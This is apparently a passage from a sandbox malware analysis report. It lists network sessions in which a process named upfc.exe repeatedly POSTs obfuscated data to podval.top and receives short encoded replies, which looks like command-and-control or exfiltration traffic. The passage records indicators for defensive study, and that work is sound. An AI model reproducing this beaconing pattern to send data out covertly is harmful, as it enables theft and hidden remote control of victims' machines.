                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mKOp4adA2Y0rOxbrNaXLQnYkHk4zF5WGraBtEzWI0JtERxBYuaPZEaRy66RQxRWngs8QHs4LvV9bxHw9eCQ8zVtZDtyiXJ5BpcCrjAt2XINgF6fspPQ7E4iv92J"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6d17b2542fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:44:06.869473934 CEST | 272 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 174868
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:06.967807055 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:07.880018950 CEST | 576 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0UReaAjVDBpdUlCsBG5Zu0vlOLzC0fWaADsyuMAO9SoJHtS6Fv43Px9zwlw49PYThg5No3D2KYD8wq54FpfME8jENaQfSkozDP%2FjcKFsFdtJk9sXqUJNVrCysiUX"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6d738f142fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:44:08.964087009 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:09.070147038 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:09.411777973 CEST | 737 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYxHGURLrRr%2BKpyuwi%2F2i9et1V3lf6%2BAWvrq2YoW06mipJHoBsU0KlCSmL6P2MKrCdlY%2FSYkWocCoY0OiU2rpR%2FSDTjK3YwQ4PZOYtrd6RC%2FvYESvCjVjQ7k9YFl"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6e45e9d42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:44:10.418082952 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:10.517961979 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:10.854902983 CEST | 739 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtJbgO0QizYMPl8%2BiKSdX0FjlyNbg%2BLSOAZkpUyfoqalnyFu7nqbd2D05wWp%2Bbs%2F%2Ffwvrl8Z6hOmiUI9GJvzGUld4LpxFuX%2F9PC2zCHfyWp3ZUN%2B%2B8F2MFmYUbkw"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6ed680942fc-EWR
                                                    alt-svc: h2=":443"; ma=60


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
113         192.168.2.10  49831        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:35.362921000 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:35.713529110 CEST1060OUTData Raw: 5f 52 5f 5f 5e 5b 57 50 58 56 55 51 50 5e 59 52 55 51 5e 5f 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R__^[WPXVUQP^YRUQ^_QTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X'9C':']'#8)-1R4-::-0%Y$W/' "08,"['$Y
Jul 3, 2024 16:43:35.836013079 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:36.166126966 CEST  580  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dzBFvkv7uUsyOeM8QgDTPunmMk3fZSebtiLi7BFpqAV%2B6UAprPxu%2FTJ5RC6XRly2LRhbcvLnPbWH1tpg9fhy91AJDueE09aaq5QdmbMVbOw1rumWHbym6A%2FIkXIH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a614acf54357-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


Session ID  Source IP     Source Port  Destination IP  Destination Port
114         192.168.2.10  49832        188.114.97.3    80
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:35.789969921 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1080
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:36.136384964 CEST1080OUTData Raw: 5a 55 5a 5b 5b 5c 57 5e 58 56 55 51 50 50 59 5a 55 5c 5e 5f 51 59 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZUZ[[\W^XVUQPPYZU\^_QYSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&:0E&)/$+)X6 [=->Z0&%#,X'Z#2+,<"['$Y
Jul 3, 2024 16:43:36.248568058 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:36.458760023 CEST  584  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SnSSO%2BvW9oTnMvjbZXwugHYg211a0Dvp7Y6EISQ4BrryoZo8fz78JY%2FU62WQfTqg3gFm44ee2%2FMQGq%2BMNPNNteqX%2BenD3ipHI6EkpABeQhRjW7sgAYWYhC8ijBbg"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6174fdd8c06-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
Jul 3, 2024 16:44:07.541932106 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
Jul 3, 2024 16:44:07.652662039 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:07.652918100 CEST1772OUTData Raw: 5a 52 5a 5e 5b 5c 57 59 58 56 55 51 50 58 59 5b 55 51 5e 55 51 5b 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZRZ^[\WYXVUQPXY[UQ^UQ[SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z&0@&9'_'0#_).67"-9$!]$U3/X( Z8<"['$Y !
Jul 3, 2024 16:44:07.951291084 CEST  733  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DB%2BrhvDg1B%2FJ6bul%2BnIFLEbMrESXiz9Seirh2PhCrW5ZpszNfCw4GY9HlpCY1X6sRKyOCpNdWsVh8uStuCAPnr971%2B29I5zwR4oXrhrL3fc%2BorD7lR25U2iTRsKW"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6db89d48c06-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 00 32 04 22 05 32 31 2b 54 2d 04 23 50 3f 04 34 5e 2d 39 25 19 2b 42 35 1e 2d 00 00 1b 20 39 3e 5b 3f 02 30 5d 31 09 20 55 22 21 20 5b 04 1c 20 00 28 39 22 01 2b 16 24 0c 25 5a 35 47 33 0e 3e 02 33 3b 2e 52 27 38 38 00 3c 3b 22 0e 30 1c 3c 04 2a 3b 3d 02 3f 24 25 01 36 0e 21 54 02 13 21 0f 24 2d 35 56 21 20 23 1e 25 33 2a 04 30 0a 28 09 24 30 2d 0f 28 33 29 0e 33 21 15 02 35 06 2b 57 33 06 3d 05 33 2e 3d 5d 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&2"21+T-#P?4^-9%+B5- 9>[?0]1 U"! [ (9"+$%Z5G3>3;.R'88<;"0<*;=?$%6!T!$-5V! #%3*0($0-(3)3!5+W3=3.=]!(#_+)V3YT0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
115         192.168.2.10  49833        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:36.295356035 CEST  294  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:36.654476881 CEST1060OUTData Raw: 5f 52 5f 5b 5e 5f 52 5b 58 56 55 51 50 5e 59 50 55 5e 5e 5a 51 5d 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_[^_R[XVUQP^YPU^^ZQ]SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!10D39%07Z)>" =%\9.Z0=]'/>#4(_;<"['$Y
Jul 3, 2024 16:43:36.750652075 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:37.085961103 CEST  580  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86THd6jlcEm8Ql4LFyQn9F1J%2B3YAoE7XJ%2BTOhiESYACu9FGCVTP427BMqzO9iZKHO4St0ShPPtoPawxGy1pQ9LQrwsPEv4yIb%2BID4BmcIZlCWTZHr59KphHUw8q2"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a61a69d01799-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
116         192.168.2.10  49834        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:37.253112078 CEST  294  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:37.604202986 CEST1060OUTData Raw: 5f 56 5f 5e 5e 5f 57 5b 58 56 55 51 50 51 59 5b 55 50 5e 54 51 58 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_^^_W[XVUQPQY[UP^TQXSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%($)]$#]==)V .9[.-=\35.' 0->77?/"['$Y
Jul 3, 2024 16:43:37.692255020 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:38.024578094 CEST  580  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rwmb7DVjUow22rXKIdgSFv6Wcp5VBkgQudB4H1PoZkCD63Xk4YMU8LbdVAoZHEj112zmqI4yRfWA6cjD4ILoRxMXfyt%2B%2FEwPV%2Fn4MIA0Qp8VvftjoeByAELQ4fCe"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6204eda42f8-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
117         192.168.2.10  49835        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:38.153502941 CEST  294  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:38.510221958 CEST1060OUTData Raw: 5a 51 5f 5a 5e 58 52 5c 58 56 55 51 50 58 59 52 55 59 5e 5b 51 5b 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQ_Z^XR\XVUQPXYRUY^[Q[SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[':8C$'' ?Z).#-1,.*'5\'0,;4 1#,<"['$Y !
Jul 3, 2024 16:43:38.644229889 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:38.977206945 CEST  580  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXtLSXH89hgh%2FR8sJWA2Yrzx8ZGuOLG2JTbDgsanJkhv%2FanfWr5v68uP03Ju4E7%2BlziGcVTK2xNd8nO01TyajbavlYizW1X2gEhApVERl9c4eozVl6QShbvIZRF9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6263bf142d0-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
118         192.168.2.10  49836        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:39.108735085 CEST  294  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:39.463613033 CEST1060OUTData Raw: 5f 54 5f 54 5b 5d 52 58 58 56 55 51 50 50 59 51 55 51 5e 59 51 5d 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_T[]RXXVUQPPYQUQ^YQ]SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[1(3?X$ '_>9 >9X-&'6'#S/+[ +/,"['$Y
Jul 3, 2024 16:43:39.571706057 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:39.917397976 CEST  582  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yEc%2B4nqZKtsnwTL0Dgji9Nl3tQqQfbuJX2%2BJ6mJ13ClWebncfCGhxy5Xj%2BnMkzB79CIFqW5NSkJD3bdF5Ppr3McK1m%2FEgAKZ6ovHBk0uXS7yyIQGp1rdBRrexPoh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a62c0e184314-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
119         192.168.2.10  49837        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:40.001620054 CEST  294  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1756
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
120         192.168.2.10  49838        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:40.048408985 CEST  294  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:40.400813103 CEST1060OUTData Raw: 5f 57 5a 5f 5e 5a 52 5c 58 56 55 51 50 5b 59 5b 55 5d 5e 59 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _WZ_^ZR\XVUQP[Y[U]^YQXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!% @0'%0)1 =*-.[353(/'X4(,,"['$Y -
Jul 3, 2024 16:43:40.493532896 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:40.699007988 CEST  575  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SSM4RrAuR6OvMpM53l9vkfDfK%2FVfCKPcRf%2Fw0ZSwAQdHcMy8EJclfvQbynLYU2%2BquiAv2gYE0iquUpDMmxCG83FFThg4kw1vGcSaH7dds8UrxPHioyabgFVIDg22"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a631ccf57271-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
Jul 3, 2024 16:43:40.785795927 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
121         192.168.2.10  49839        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
Timestamp  Bytes transferred  Direction  Data
Jul 3, 2024 16:43:40.928491116 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:41.276802063 CEST1060OUTData Raw: 5f 54 5f 54 5b 56 52 5a 58 56 55 51 50 5f 59 54 55 51 5e 5f 51 5d 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_T[VRZXVUQP_YTUQ^_Q]S^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X2?$)4';Z)>7:.'50#-.#_41#-,"['$Y =
Jul 3, 2024 16:43:41.388411045 CEST  25  IN  HTTP/1.1 100 Continue
Jul 3, 2024 16:43:41.735140085 CEST  580  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
